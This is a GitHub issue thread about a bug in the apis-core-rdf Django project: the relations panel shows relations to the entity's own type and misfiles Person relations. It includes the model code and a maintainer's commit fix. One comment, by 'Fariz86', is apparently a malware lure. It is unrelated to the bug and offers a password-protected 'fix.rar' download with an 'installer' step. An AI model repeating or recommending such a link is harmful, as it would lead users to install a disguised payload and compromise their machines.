### ISSUE TITLE
View/Edit shows panel for relations to its own type, even when not allowed; and sometimes misclassifies relations to other types as own type

### ISSUE THREAD

**Issue by richardhadden** [acdh-oeaw/apis-core-rdf#1113]
1) Should not show "SiblingRelation" as a possible relation of "Sibling Relation"
![image](https://github.com/user-attachments/assets/e5824889-345e-4ad6-850b-92292c8fcd5a)

2)
![image](https://github.com/user-attachments/assets/dbc0a0cb-0b7d-4143-8290-0eec619efa54)

```python
class ParentalRelationship(Statement):
    pass

class ParentalRelationshipHasParent(VersionMixin, Relation):
    subj_model = ParentalRelationship
    obj_model = Person

    probability = models.IntegerField()


class ParentalRelationshipHasChild(VersionMixin, Relation):
    subj_model = ParentalRelationship
    obj_model = Person

    probability = models.IntegerField()

```

`ParentalRelationship` should have relation to `Person` (via `ParentalRelationshipHasParent` or `ParentalRelationshipHasChild`), not to `ParentalRelationship` (as in second screen shot)

I can't really figure out what's causing this — it was created correctly (impossible to create incorrectly); running an additional migration might be the cause (second time this has happened after a migration)

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by b1rger** [comment]
So, what you're saying is, that it should not list other entities as possible targets, if there is actually no relationsship that provides that entity/entity combination?

**Comment by richardhadden** [comment]
Yes — actually, it does do this. It's not showing "impossible" relations to other entity types, only to the type of entity currently being viewed/edited.

And, as in second screenshot, it "moves" relations to the viewed-type for some reason (both relations — to Maximilian and Frederick — should be under Persons)

**Comment by b1rger** [comment]
Should be fixed by 35b670918d42148d2fe99b940d0895998b4e6efa
